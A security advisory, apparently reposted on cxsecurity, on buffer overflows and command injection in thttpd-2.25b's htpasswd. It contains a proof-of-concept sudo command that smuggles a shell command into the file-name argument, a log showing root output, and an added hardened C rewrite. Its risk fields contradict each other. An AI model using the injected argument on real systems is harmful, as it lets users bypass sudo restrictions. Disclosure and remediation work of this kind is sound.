thttpd-2.25b htpasswd Vulnerabilities

2018.10.03
Risk: Low
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Title: thttpd-2.25b htpasswd Vulnerabilities
Author: Larry W. Cashdollar, @_larry0
Date: 2006-03-04
CVE-ID: [CVE-2002-2389]
Download Site: http://acme.com/software/thttpd/
Vendor: Acme Software
Vendor Notified: 2006-03-04
Vendor Contact: thttpd@mail.acme.com
Advisory: http://www.vapid.dhs.org/advisories/thttpd-2.25b_htpasswd_problems.html

Description: thttpd is a simple, small, portable, fast, and secure HTTP server.

Vulnerability: thttpd-2.25b - Two buffer overflows and command execution in htpasswd.c. htpasswd is not installed setuid root; however, in some user installations htpasswd might be executed via sudo. Exploiting the above vulnerabilities would allow a non-privileged user to circumvent sudo ACLs, for example.

    line 189: strcpy(user,argv[2]);
    line 197: strcpy(l,line);
    line 215 & 216:
        sprintf(command,"cp %s %s",temp_template,argv[1]);
        system(command);

If perhaps sudo is being used to limit what commands a user can execute as www, you could run other commands like so:

    sudo -u www /bin/htpasswd -c "blah;id>lpo" webauth
    sudo -u www /bin/htpasswd "blah;id>lpo" webauth

    larry@mog:~$ sudo /bin/htpasswd -c "blh;id>lp" www
    larry@mog:~$ sudo /bin/htpasswd "blh;id>lp" www
    Changing password for user www
    New password:
    Re-type new password:
    larry@mog:~$ cat lp
    uid=0(root) gid=0(root) groups=0(root)
    larry@mog:~$ sudo id
    We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things:
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
    Password
    Sorry, user larry is not allowed to execute '/usr/bin/id' as root on mog.
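
The hardened form of the three calls quoted above, as an added example that is not code from thttpd or from the advisory: a length-checked copy in place of both strcpy() calls, and a direct file copy in place of sprintf() + system(), so the password-file argument never reaches a shell. MAX_USER, bounded_copy and copy_file are names and sizes assumed here; the advisory does not give the real buffer sizes.

```c
#include <stdio.h>
#include <string.h>

#define MAX_USER 64   /* assumed size; the advisory does not state the real one */

/* Replaces strcpy(user,argv[2]) and strcpy(l,line): reject input that does
 * not fit (terminator included) instead of writing past the buffer. */
int bounded_copy(char *dst, size_t dstlen, const char *src) {
    size_t n = strlen(src);
    if (n >= dstlen)
        return -1;                 /* too long: dst is left untouched */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Replaces sprintf(command,"cp %s %s",...) + system(command): the bytes are
 * copied by this process, so ';' or '>' in dst is just part of a file name. */
int copy_file(const char *src, const char *dst) {
    char buf[4096];
    size_t n;
    int rc = 0;
    FILE *in = fopen(src, "rb");
    if (in == NULL)
        return -1;
    FILE *out = fopen(dst, "wb");
    if (out == NULL) {
        fclose(in);
        return -1;
    }
    while ((n = fread(buf, 1, sizeof buf, in)) > 0) {
        if (fwrite(buf, 1, n, out) != n) { rc = -1; break; }
    }
    if (ferror(in))
        rc = -1;
    fclose(in);
    if (fclose(out) != 0)
        rc = -1;
    return rc;
}

int main(int argc, char **argv) {
    char user[MAX_USER];
    if (argc != 3 || bounded_copy(user, sizeof user, argv[2]) != 0) {
        fprintf(stderr, "usage: htpasswd-demo passwordfile username\n");
        return 1;
    }
    printf("user accepted: %s\n", user);
    return 0;
}
```

With this form, a password-file argument such as "blh;id>lp" produces a file with that literal name and no separate "lp" output.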

References:

http://www.vapidlabs.com/advisory.php?v=106



Copyright 2018, cxsecurity.com

 
